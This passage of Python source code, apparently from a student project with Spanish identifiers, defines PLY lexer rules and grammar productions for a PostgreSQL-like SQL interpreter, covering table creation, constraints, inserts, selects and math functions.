r'\\('\nt_PARCIERRE = r'\\)'\nt_SIGNO_MAS = r'\\+'\nt_SIGNO_MENOS = r'\\-'\nt_SIGNO_DIVISION = r'\\/'\nt_SIGNO_POR= r'\\*'\nt_LLAVEABRE = r'\\{'\nt_LLAVECIERRE = r'\\}'\nt_CORCHETEABRE = r'\\['\nt_CORCHETECIERRE = r'\\]'\nt_DOBLE_DOSPUNTOS= r'\\:\\:'\nt_DOSPUNTOS= r'\\:'\nt_SIGNO_POTENCIA = r'\\^'\nt_SIGNO_MODULO = r'\\%'\nt_MAYORIGUALQUE = r'\\>\\='\nt_MENORIGUALQUE = r'\\<\\='\nt_MAYORQUE = r'\\>'\nt_MENORQUE = r'\\<'\nt_COMILLA = r'\\''\nt_DOLAR= r'\\$'\n\ndef t_DOLAR_LABEL(t):\n r'\\$.*?\\$'\n return t\n\n\n# expresion regular para los id´s\ndef t_ID (t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n if t.value.upper() in reservadas:\n t.value = t.value.upper()\n t.type = t.value \n return t\n\n# expresion regular para comentario de linea\ndef t_COMMENT(t):\n r'--.*'\n t.lexer.lineno += 1\n\n# expresion regular para comentario de linea\ndef t_COMMENT_MULT(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\ndef t_NUM_DECIMAL(t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n return t\n \n# expresion regular para reconocer numeros\ndef t_NUMERO(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n# expresion regular para reconocer formato hora\ndef t_F_HORA(t):\n 
r'\\'\\s*(\\d+\\s+(hours|HOURS))?(\\s*\\d+\\s+(minutes|MINUTES))?(\\s*\\d+\\s+(seconds|SECONDS))?\\s*\\''\n t.value = t.value[1:-1]\n return t\n\n# expresion regular para reconocer fecha_hora\ndef t_FECHA_HORA(t):\n r'\\'\\d+-\\d+-\\d+\\s\\d+:\\d+:\\d+\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%Y-%m-%d %H:%M:%S')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\ndef t_FECHA(t):\n r'\\'\\d\\d\\d\\d-\\d\\d-\\d\\d\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%Y-%m-%d')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\n\ndef t_HORA(t):\n r'\\'\\d+:\\d+:\\d+\\''\n t.value = t.value[1:-1]\n from datetime import datetime\n try:\n t.value = datetime.strptime(t.value,'%H:%M:%S')\n except ValueError:\n t.value = datetime(1900,1,1)\n return t\n\n\ndef t_CADENASIMPLE(t):\n r'\\'(\\s*|.*?)\\''\n t.value = str(t.value)\n return t\n \n# expresion regular para reconocer cadenas\ndef t_CADENA(t):\n r'\\\"(\\s*|.*?)\\\"'\n t.value = str(t.value)\n return t\n\n# expresion regular para saltos de linea\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n# expresion regular para reconocer errores\ndef t_error(t):\n err = T_error('LEXICO', t.value, 'TOKEN DESCONOCIDO', str(t.lineno), str(t.lexpos))\n TokenError.append(err)\n t.lexer.skip(1)\n\n# fin de las expresiones regulares para reconocer nuestro lenguaje.\n\nanalizador = lex.lex()\n\n# funcion para realizar el analisis lexico de nuestra entrada\ndef analizarLex(texto): \n analizador.input(texto)# el parametro cadena, es la cadena de texto que va a analizar.\n\n #ciclo para la lectura caracter por caracter de la cadena de entrada.\n textoreturn = \"\"\n while True:\n tok = analizador.token()\n if not tok : break\n #print(tok)\n textoreturn += str(tok) + \"\\n\"\n return textoreturn \n\n\n ######### inicia el analizador Sintactico ##########\n\n # Asociación de operadores y precedencia\n\n #FALTAN ALGUNOS SIGNOS/PALABRAS RESERVADAS EN LA PRECEDENCIA\nprecedence = (\n ('left','OR'),\n ('left','AND'),\n ('left','MAYORIGUALQUE','MENORIGUALQUE','MAYORQUE','MENORQUE'),\n ('left','SIGNO_MAS','SIGNO_MENOS'),\n ('left','SIGNO_POR','SIGNO_DIVISION'),\n ('left','SIGNO_POTENCIA','SIGNO_MODULO'), \n ('right','UMENOS')\n ) \n\n\n# Definición de la gramática\ndef p_inicio(t):\n '''inicio : instrucciones '''\n #envGlobal = Environment(None)\n #iniciarEjecucion = Main(t[1])\n #iniciarEjecucion.call(envGlobal)\n t[0] = t[1] \n\ndef p_instrucciones_lista(t):\n '''instrucciones : instrucciones instruccion \n | instruccion '''\n if len(t) == 3:\n t[1].append(t[2])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_instrucciones_evaluar(t):\n '''instruccion : ins_use\n | ins_show\n | ins_alter\n | ins_drop\n | ins_create\n | ins_insert\n | ins_select\n | ins_update\n | ins_delete\n | exp\n | ins_create_pl\n | instruccion_if\n | instruccion_case\n | create_index'''\n t[0] = t[1]\n\ndef p_instruccion_use(t):\n '''ins_use : USE ID PUNTO_COMA'''\n t[0] = Use(t[2], t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_instruccion_show(t):\n '''ins_show : SHOW DATABASES PUNTO_COMA'''\n t[0] = Show_Database(t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_instruccion_create(t):\n '''ins_create : CREATE tipo_create'''\n t[0] = t[2] \n\ndef p_tipo_create(t):\n '''tipo_create : ins_replace DATABASE if_exists ID create_opciones PUNTO_COMA\n | TABLE ID PARABRE definicion_columna PARCIERRE ins_inherits PUNTO_COMA\n | TYPE ID AS 
ENUM PARABRE list_vls PARCIERRE PUNTO_COMA'''\n if t[1] == 'TYPE':\n t[0] = Create_Type(t[2], t[5], t.slice[1].lexpos, t.slice[1].lineno)\n elif t[1] == 'TABLE':\n arreglo = []\n for item in t[4]:\n for i in item:\n arreglo.append(i)\n\n t[0] = Create_Table(t[2], arreglo,t[6], t.slice[1].lexpos, t.slice[1].lineno)\n else:\n t[0] = Create(t[1], 0, t[4], t.slice[2].lexpos, t.slice[2].lineno)\n\ndef p_definicion_columna(t):\n '''definicion_columna : definicion_columna COMA columna \n | columna ''' # no se *** si va la coma o no\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n t[0] = [t[1]]\n\ndef p_columna(t):\n '''columna : ID tipo_dato definicion_valor_defecto ins_constraint\n | primary_key \n | foreign_key \n | unique'''\n if len(t) == 2:\n t[0] = t[1]\n else:\n columna = []\n columna.append( Column(t[1], t[2]['type'], t[3], t[2]['length']))\n\n for item in t[4]:\n if 'name' not in item:\n if item['type'] == 'primary':\n item['name'] = 'pk_' + t[1]\n if item['type'] == 'not null':\n item['name'] = 'nn_' + t[1]\n if item['type'] == 'unique':\n item['name'] = 'uq_' + t[1]\n if item['type'] == 'foreign':\n item['name'] = 'fk_' + t[1]\n if item['type'] == 'check':\n item['name'] = 'ch_' + t[1]\n if item['type'] != 'check':\n item['value'] = t[1]\n columna.append(item)\n t[0] = columna\n\n#TODO: HERENCIA\ndef p_ins_inherits(t):\n '''ins_inherits : INHERITS PARABRE ID PARCIERRE\n | ''' #EPSILON\n if len(t) > 1:\n t[0] = t[3]\n else:\n t[0] = None\n\ndef p_unique(t):\n ''' unique : UNIQUE PARABRE nombre_columnas PARCIERRE '''\n if isinstance(t[3],list):\n ids = []\n for item in t[3]:\n ids.append({'type': 'unique', 'name': 'uq_'+item, 'value': item})\n t[0] = ids\n else:\n t[0] = [{'type': 'unique', 'name': 'uq_'+t[3], 'value': t[3]}]\n\ndef p_primary_key(t):\n '''primary_key : PRIMARY KEY PARABRE nombre_columnas PARCIERRE ins_references'''\n if isinstance(t[4],list):\n ids = []\n for item in t[4]:\n ids.append({'type': 'primary', 'name': 'pk_'+item, 'value': item})\n t[0] = ids\n else:\n t[0] = [{'type': 'primary', 'name': 'pk_'+t[4], 'value': t[4]}]\n \ndef p_foreign_key(t):\n '''foreign_key : FOREIGN KEY PARABRE nombre_columnas PARCIERRE REFERENCES ID PARABRE nombre_columnas PARCIERRE ins_references'''\n \n if isinstance(t[4],list):\n ids = []\n posicion = t[4]\n reference = t[9]\n for i in range(len(posicion)):\n ids.append({'type': 'foreign', 'name':'fk_'+posicion[i], 'value': posicion[i], 'references': reference[i]})\n t[0] = ids\n else:\n t[0] = [{'type': 'foreign', 'name':'fk_'+t[4], 'value': t[4], 'references': t[9]}]\n\ndef p_nombre_columnas(t):\n '''nombre_columnas : nombre_columnas COMA ID \n | ID '''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\ndef p_tipo_dato(t):\n '''tipo_dato : SMALLINT \n | BIGINT\n | NUMERIC\n | DECIMAL PARABRE NUMERO COMA NUMERO PARCIERRE\n | INTEGER\n | REAL\n | DOUBLE PRECISION\n | CHAR PARABRE NUMERO PARCIERRE\n | VARCHAR PARABRE NUMERO PARCIERRE\n | CHARACTER PARABRE NUMERO PARCIERRE\n | TEXT\n | TIMESTAMP arg_precision\n | TIME arg_precision\n | DATE\n | INTERVAL arg_tipo arg_precision\n | BOOLEAN\n | MONEY'''\n if t.slice[1].type == 'SMALLINT':\n t[0] = {'type':DBType.smallint, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'BIGINT':\n t[0] = {'type':DBType.bigint, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'NUMERIC':\n t[0] = {'type':DBType.numeric, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'DECIMAL':\n t[0] = {'type':DBType.decimal, 
'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'INTEGER':\n t[0] = {'type':DBType.integer, 'length': -1, 'default':0 }\n elif t.slice[1].type == 'REAL':\n t[0] = {'type':DBType.real, 'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'DOUBLE':\n t[0] = {'type':DBType.double_precision, 'length': -1, 'default':0.0 }\n elif t.slice[1].type == 'TEXT':\n t[0] = {'type':DBType.text, 'length': -1, 'default':\"\" }\n elif t.slice[1].type == 'DATE':\n t[0] = {'type':DBType.date, 'length': -1, 'default':\"2000-01-01\" }\n elif t.slice[1].type == 'BOOLEAN':\n t[0] = {'type':DBType.boolean, 'length': -1, 'default':False }\n elif t.slice[1].type == 'MONEY':\n t[0] = {'type':DBType.money, 'length': -1, 'default':0.0 }\n \n elif t.slice[1].type == 'TIMESTAMP':\n t[0] = {'type':DBType.timestamp_wtz, 'length': t[2], 'default':\"2000-01-01\" }\n elif t.slice[1].type == 'TIME':\n t[0] = {'type':DBType.time_wtz, 'length': t[2], 'default':\"00:00:01\" }\n elif t.slice[1].type == 'INTERVAL':\n t[0] = {'type':DBType.interval, 'length': -1, 'default':\"1 HOUR 1 MINUTE 1 SECOND\" }\n\n elif t.slice[1].type == 'CHAR':\n t[0] = {'type':DBType.char, 'length':t[3], 'default':\"\" }\n elif t.slice[1].type == 'VARCHAR':\n t[0] = {'type':DBType.varchar, 'length':t[3], 'default':\"\" }\n elif t.slice[1].type == 'CHARACTER':\n t[0] = {'type':DBType.character, 'length':t[3], 'default':\"\" }\n\ndef p_arg_precision(t):\n '''arg_precision : PARABRE NUMERO PARCIERRE \n | ''' #epsilon\n if len(t) == 4:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_arg_tipo(t):\n '''arg_tipo : MONTH\n | YEAR\n | HOUR\n | MINUTE\n | SECOND \n | '''\n if len(t) == 2:\n t[0] = t[1]\n else:\n t[0] = None\n\ndef p_definicion_valor_defecto(t):\n '''definicion_valor_defecto : DEFAULT tipo_default \n | ''' #epsilon\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_ins_constraint(t):\n '''ins_constraint : ins_constraint constraint restriccion_columna \n | restriccion_columna\n |''' #epsilon\n if len(t) > 2:\n if t[2] != None:\n diccionario = t[3]\n diccionario['name'] = t[2]\n t[1].append(diccionario)\n else:\n t[1].append(t[3])\n t[0] = t[1]\n elif len(t) == 2:\n t[0] = [t[1]]\n else:\n t[0] = []\n\ndef p_constraint(t):\n '''constraint : CONSTRAINT ID \n | '''\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_restriccion_columna(t):\n '''restriccion_columna : NOT NULL \n | SET NOT NULL \n | PRIMARY KEY \n | UNIQUE \n | NULL \n | CHECK PARABRE exp PARCIERRE \n ''' #cambio del condicion columna\n \n if t.slice[1].type== 'UNIQUE' :\n t[0] = {'type':'unique'}\n elif t.slice[1].type == 'NULL' :\n t[0] = {'type' : 'null' }\n elif t.slice[1].type == 'NOT' and t.slice[2].type == 'NULL':\n t[0] = {'type' : 'not null' }\n print(\"entra not null\")\n elif t.slice[1].type == 'PRIMARY' and t.slice[2].type == 'KEY':\n print(\"entra primary\")\n t[0] = {'type':'primary'}\n elif t.slice[1].type == 'CHECK' :\n t[0] = {'type':'check', 'value': t[3]}\n\n\n\ndef p_references(t):\n '''ins_references : ON DELETE accion ins_references\n | ON UPDATE accion ins_references\n | '''\n\ndef p_accion(t):\n '''accion : CASCADE\n | SET NULL\n | SET DEFAULT\n | NO ACTION'''\n\ndef p_tipo_default(t): #ESTE NO SE SI SON RESERVADAS O LOS VALORES\n '''tipo_default : NUMERO\n | NUM_DECIMAL\n | CADENASIMPLE\n | CADENA\n | TRUE\n | FALSE\n | FECHA\n | FECHA_HORA\n | NULL\n | '''\n t[0] = t[1]\n \ndef p_ins_replace(t): \n '''ins_replace : OR REPLACE\n | '''#EPSILON\n if len(t) ==3:\n t[0] = True\n else: \n t[0] = False\n\ndef p_if_exists(t): \n 
'''if_exists : IF NOT EXISTS\n                | IF EXISTS\n                | ''' # EPSILON\n\ndef p_create_opciones(t): \n    '''create_opciones : OWNER SIGNO_IGUAL user_name create_opciones\n                    | MODE SIGNO_IGUAL NUMERO create_opciones\n                    | '''\n    if len(t) == 5:\n        if t[1] == 'MODE':\n            t[0] = t[3]\n        else:\n            t[0] = 0\n    else: \n        t[0] = 0\n\ndef p_user_name(t):\n    '''user_name : ID\n                | CADENA \n                | CADENASIMPLE'''\n    t[0] = t[1]\n\ndef p_alter(t): \n    '''ins_alter : ALTER tipo_alter ''' \n    t[0] = t[2]\n\ndef p_tipo_alter(t): \n    '''tipo_alter : DATABASE ID alter_database PUNTO_COMA\n                    | TABLE ID alteracion_tabla PUNTO_COMA''' # unsure whether the semicolons belong here\n    if t[1] == 'DATABASE':\n        if t[3] == None:\n            t[0] = Alter_Database(t[2],t[2], t.slice[1].lexpos, t.slice[1].lineno)\n        else: \n            t[0] = Alter_Database(t[2],t[3], t.slice[1].lexpos, t.slice[1].lineno)\n    else: \n        t[0] = Alter_Table(t[2], t[3], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_alteracion_tabla(t): \n    '''alteracion_tabla : alteracion_tabla COMA alterar_tabla\n                        | alterar_tabla'''\n    if len(t) == 4:\n        t[1].append(t[3])\n        t[0] = t[1]\n    else:\n        t[0] = [t[1]]\n\ndef p_alterar_tabla(t): \n    #alter column arrives as a list\n    '''alterar_tabla : ADD COLUMN ID tipo_dato\n                    | ADD CONSTRAINT ID ins_constraint_dos\n                    | ADD ins_constraint_dos\n                    | ALTER COLUMN ID TYPE tipo_dato\n                    | ALTER COLUMN ID SET NOT NULL\n                    | DROP COLUMN ID\n                    | DROP CONSTRAINT ID'''\n    if t[1] == 'ADD' and t[2] == 'COLUMN':\n        t[0] = Add_Column(t[3], t[4], t.slice[1].lexpos, t.slice[1].lineno)\n    elif t[1] == 'ADD' and t[2] == 'CONSTRAINT':\n        t[4]['name'] = t[3]\n        t[0] = Add_Constraint('', t[4], t.slice[1].lexpos, t.slice[1].lineno)\n    elif t[1] == 'ADD':\n        nombre = t[2]['value']\n        if t[2]['type'] == 'unique':\n            t[2]['name'] = 'un_' + str(nombre)\n            t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n        elif t[2]['type'] == 'foreign':\n            t[2]['name'] = 'fk_' + str(nombre)\n            t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n        elif t[2]['type'] == 'check':\n            t[2]['name'] = 'ch_check'\n            t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n        elif t[2]['type'] == 'primary':\n            t[2]['name'] = 'pk_' + str(nombre)\n            t[0] = Add_Constraint('', t[2], t.slice[1].lexpos, t.slice[1].lineno)\n    elif t[1] == 'ALTER':\n        if len(t) == 7:\n            t[0] = Alter_Column(t[3], 'SET NOT NULL', None, t.slice[1].lexpos, t.slice[1].lineno)\n        else: \n            t[0] = Alter_Column(t[3], 'TYPE', t[5], t.slice[1].lexpos, t.slice[1].lineno)\n    elif t[1] == 'DROP' and t[2] == 'COLUMN':\n        t[0] = Drop_Column(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n    elif t[1] == 'DROP' and t[2] == 'CONSTRAINT':\n        t[0] = Drop_Constraint(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_ins_constraint_dos(t):\n    '''ins_constraint_dos : UNIQUE PARABRE ID PARCIERRE\n                        | FOREIGN KEY PARABRE ID PARCIERRE REFERENCES fkid PARABRE ID PARCIERRE\n                        | CHECK PARABRE exp PARCIERRE \n                        | PRIMARY KEY PARABRE ID PARCIERRE'''\n    if t[1] == 'UNIQUE':\n        t[0] = {'type': 'unique', 'value': t[3]}\n    elif t[1] == 'FOREIGN':\n        t[0] = {'type': 'foreign', 'value': t[4], 'references': t[9]}\n    elif t[1] == 'CHECK':\n        t[0] = {'type': 'check', 'value': t[3]}\n    elif t[1] == 'PRIMARY':\n        t[0] = {'type': 'primary', 'value': t[4]}\n\ndef p_fkid(t):\n    '''fkid : ID\n            | '''\n\ndef p_alter_database(t): \n    '''alter_database : RENAME TO ID\n                    | OWNER TO ID'''\n    if t[1] == 'RENAME':\n        t[0] = t[3]\n    else:\n        t[0] = None\n\ndef p_drop(t): \n    '''ins_drop : DROP tipo_drop'''\n    t[0] = t[2]\n\ndef p_tipo_drop(t): \n    '''tipo_drop : DATABASE if_exists ID PUNTO_COMA\n                 | TABLE ID 
PUNTO_COMA'''\n if len(t) == 5:\n t[0] = Drop_Database(t[3], t.slice[1].lexpos, t.slice[1].lineno)\n else:\n t[0] = Drop_Table(t[2], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_ins_insert(t):\n '''ins_insert : INSERT INTO ID VALUES PARABRE list_vls PARCIERRE PUNTO_COMA \n | INSERT INTO ID PARABRE list_id PARCIERRE VALUES PARABRE list_vls PARCIERRE PUNTO_COMA'''\n if len(t) == 9: \n t[0] = Insert(t[3], t[6], None, t.slice[1].lexpos, t.slice[1].lineno)\n else: \n t[0] = Insert(t[3], t[9], t[5], t.slice[1].lexpos, t.slice[1].lineno)\n\ndef p_list_id(t):\n '''list_id : list_id COMA ID\n | ID'''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\n\ndef p_list_vls(t):\n '''list_vls : list_vls COMA val_value\n | val_value '''\n if len(t) == 4:\n t[1].append(t[3])\n t[0] = t[1]\n else:\n arreglo = []\n arreglo.append(t[1])\n t[0] = arreglo\n\ndef p_val_value(t):\n '''val_value : CADENA\n | CADENASIMPLE\n | NUMERO\n | NUM_DECIMAL\n | FECHA_HORA\n | TRUE\n | FALSE \n | NULL\n | F_HORA\n | functions\n | FECHA\n | HORA'''\n if t.slice[1].type == 'CADENA':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CADENASIMPLE':\n t[0] = Literal(t[1],Type.STRING,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NUM_DECIMAL':\n t[0] = Literal(t[1],Type.DECIMAL,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FECHA_HORA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FECHA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'HORA':\n t[0] = Literal(t[1],Type.TIME,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'F_HORA':\n t[0] = Literal(t[1],Type.DATE,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TRUE':\n t[0] = Literal(True,Type.BOOLEAN,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FALSE':\n t[0] = Literal(False,Type.BOOLEAN,t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'NULL':\n t[0] = Literal(t[1],Type.NULL,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = t[1]\n\ndef p_ins_select(t):\n '''ins_select : ins_select UNION option_all ins_select puntoycoma\n | ins_select INTERSECT option_all ins_select puntoycoma\n | ins_select EXCEPT option_all ins_select puntoycoma\n | SELECT arg_distict colum_list FROM table_list arg_where arg_having arg_group_by arg_order_by arg_limit arg_offset puntoycoma\n | SELECT functions as_id puntoycoma'''\n #t[0] = Select()\n if len(t) == 13:\n if t[3] != '*':\n t[0] = Select(t[2], t[3]['id'], t[5], t[6], t[8], t[3]['aggregates'], t[7], t[9],t.slice[1].lineno,t.slice[1].lexpos)\n else:\n t[0] = Select(t[2], t[3], t[5], t[6], t[8], None, t[7], t[9],t.slice[1].lineno,t.slice[1].lexpos)\n elif len(t) == 5:\n t[0] = Select_Func(t[2], t.slice[1].lexpos, t.slice[1].lineno)\n \n# TODO: PENDIENTE\ndef p_option_all(t):\n '''option_all : ALL\n | '''\n\ndef p_puntoycoma(t):\n '''puntoycoma : PUNTO_COMA\n | '''\n\ndef p_arg_distict(t):\n '''arg_distict : DISTINCT\n | '''\n if len(t) == 2:\n t[0] = True\n else:\n t[0] = False\n\ndef p_colum_list(t):\n '''colum_list : s_list\n | SIGNO_POR '''\n if t[1] == '*':\n t[0] = t[1]\n else: \n t[0] = t[1]\n\n#TODO: PENDIENTE\ndef p_s_list(t):\n '''s_list : s_list COMA columns as_id\n | columns as_id'''\n if len(t) == 5:\n if 'funcion' in t[3]:\n 
t[1]['aggregates'].append(t[3]['funcion'])\n t[1]['id'].append({'name': t[3]['id'], 'father': None, 'as': t[4]})\n t[0] = t[1]\n elif 'father' in t[3]:\n t[1]['id'].append({'name': t[3]['name'], 'father': t[3]['father'], 'as': t[4]})\n t[0] = t[1]\n else:\n if 'funcion' in t[1]:\n t[0] = {'aggregates': [t[1]['funcion']], 'id': [t[1]['id']]}\n elif 'father' in t[1]:\n t[0] = {'aggregates': [], 'id':[{'name': t[1]['name'], 'father': t[1]['father'], 'as': t[2]}]}\n\ndef p_columns(t):\n '''columns : ID dot_table \n | aggregates ''' #{'funcion':funcion, 'id':id}\n if len(t) == 3:\n if t[2] != None:\n t[0] = {'father': t[1], 'name': t[2]}\n else: \n t[0] ={'father': None, 'name': t[1]}\n else:\n t[0] = t[1]\n \ndef p_dot_table(t):\n '''dot_table : PUNTO ID\n | '''\n if len(t) == 3:\n t[0] = t[2]\n else:\n t[0] = None\n\ndef p_as_id(t): # REVISRA CADENA Y AS CADENA\n '''as_id : AS ID\n | AS CADENA\n | AS CADENASIMPLE\n | CADENA\n | ID\n | CADENASIMPLE\n | '''\n if len(t) == 3:\n t[0] = t[2]\n elif len(t) == 2:\n t[0] = t[1]\n else: \n t[0] = None\n\ndef p_aggregates(t):\n '''aggregates : COUNT PARABRE param PARCIERRE \n | SUM PARABRE param PARCIERRE\n | AVG PARABRE param PARCIERRE\n | MAX PARABRE param PARCIERRE\n | MIN PARABRE param PARCIERRE ''' \n if t.slice[1] == 'COUNT':\n t[0] = {'funcion':Count(t[3]), 'id': 'COUNT(' + t[3].id + ')'}\n if t.slice[1] == 'SUM':\n t[0] = {'funcion':Sum(t[3]), 'id': 'SUM(' + t[3].id + ')'}\n if t.slice[1] == 'AVG':\n t[0] = {'funcion':Avg(t[3]), 'id': 'AVG(' + t[3].id + ')'}\n if t.slice[1] == 'MAX':\n t[0] = {'funcion':Max(t[3]), 'id': 'MAX(' + t[3].id + ')'}\n if t.slice[1] == 'MIN':\n t[0] = {'funcion':Min(t[3]), 'id': 'MIN(' + t[3].id + ')'}\n\ndef p_functions(t):\n '''functions : math\n | trig\n | string_func\n | time_func\n '''\n t[0] = t[1]\n # CORREGIR GRAMATICA \n\ndef p_math(t):\n '''math : ABS PARABRE op_numero PARCIERRE\n | CBRT PARABRE op_numero PARCIERRE\n | CEIL PARABRE op_numero PARCIERRE\n | CEILING PARABRE op_numero PARCIERRE\n | DEGREES PARABRE op_numero PARCIERRE\n | DIV PARABRE op_numero COMA op_numero PARCIERRE\n | EXP PARABRE op_numero PARCIERRE\n | FACTORIAL PARABRE op_numero PARCIERRE\n | FLOOR PARABRE op_numero PARCIERRE\n | GCD PARABRE op_numero COMA op_numero PARCIERRE\n | LN PARABRE op_numero PARCIERRE\n | LOG PARABRE op_numero PARCIERRE\n | MOD PARABRE op_numero COMA op_numero PARCIERRE\n | PI PARABRE PARCIERRE\n | POWER PARABRE op_numero COMA op_numero PARCIERRE \n | ROUND PARABRE op_numero arg_num PARCIERRE \n | SQRT PARABRE op_numero PARCIERRE \n | SIGN PARABRE op_numero PARCIERRE\n | TRUNC PARABRE op_numero PARCIERRE\n | RANDOM PARABRE PARCIERRE\n | RADIANS PARABRE op_numero PARCIERRE\n | WIDTH_BUCKET PARABRE op_numero COMA op_numero COMA op_numero COMA op_numero PARCIERRE'''\n if t.slice[1].type == 'PI':\n t[0] = Pi(t.slice[3].lexpos,t.slice[3].lineno)\n else:\n if t.slice[1].type == 'ABS':\n t[0] = Abs(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CBRT':\n t[0] = Cbrt(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CEIL':\n t[0] = Ceil(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'CEILING':\n t[0] = Ceiling(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DEGREES':\n t[0] = Degrees(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'DIV':\n t[0] = Div(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'EXP':\n t[0] = Exp(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FACTORIAL':\n 
t[0] = Factorial(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'FLOOR':\n t[0] = Floor(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'GCD':\n t[0] = Gcd(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'LN':\n t[0] = Ln(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'LOG':\n t[0] = Log(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SQRT':\n t[0] = Sqrt(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'SIGN':\n t[0] = Sign(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'TRUNC':\n t[0] = Trunc(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'RADIANS':\n t[0] = Radians(t[3],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'RANDOM':\n t[0] = Randomic(t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'MOD':\n t[0] = Mod(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'POWER':\n t[0] = Power(t[3],t[5],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'ROUND':\n t[0] = Round(t[3],t[4],t.slice[1].lexpos,t.slice[1].lineno)\n elif t.slice[1].type == 'WIDTH_BUCKET':\n t[0] = Width_Bucket(t[3],t[5],t[7],t[9],t.slice[1].lexpos,t.slice[1].lineno)\n\ndef p_arg_num(t):\n ''' arg_num : COMA NUMERO \n |'''\n if len(t) == 3:\n t[0] = Literal(t[2],Type.INT,t.slice[2].lexpos,t.slice[2].lineno)\n t[0] = Literal(0,Type.INT,0,0)\n\ndef p_op_numero(t):\n ''' op_numero : NUMERO \n | NUM_DECIMAL\n | SIGNO_MENOS NUMERO %prec UMENOS\n | SIGNO_MENOS NUM_DECIMAL %prec UMENOS'''\n if t.slice[1].type == 'NUMERO':\n t[0] = Literal(t[1],Type.INT,t.slice[1].lexpos,t.slice[1].lineno)\n else:\n t[0] = Literal(t[1],Type.DECIMAL,t.slice[1].lexpos,t.slice[1].lineno)\n\n if t.slice[1].type == 'SIGNO_MENOS':\n if t.slice[2].type == 'NUMERO':\n t[0] = Neg(t[2],Type.INT,t.slice[2].lexpos,t.slice[2].lineno)\n else:\n t[0] = Neg(t[2],Type.DECIMAL,t.slice[2].lexpos,t.slice[2].lineno)\n\n\ndef p_trig(t):\n '''trig : ACOS PARABRE op_numero PARCIERRE\n | ACOSD PARABRE op_numero PARCIERRE\n | ASIN PARABRE op_numero PARCIERRE\n | ASIND PARABRE op_numero PARCIERRE\n | ATAN PARABRE op_numero PARCIERRE\n | ATAND PARABRE op_numero PARCIERRE\n | ATAN2 PARABRE op_numero COMA op_numero PARCIERRE\n | ATAN2D PARABRE NUMERO COMA op_numero 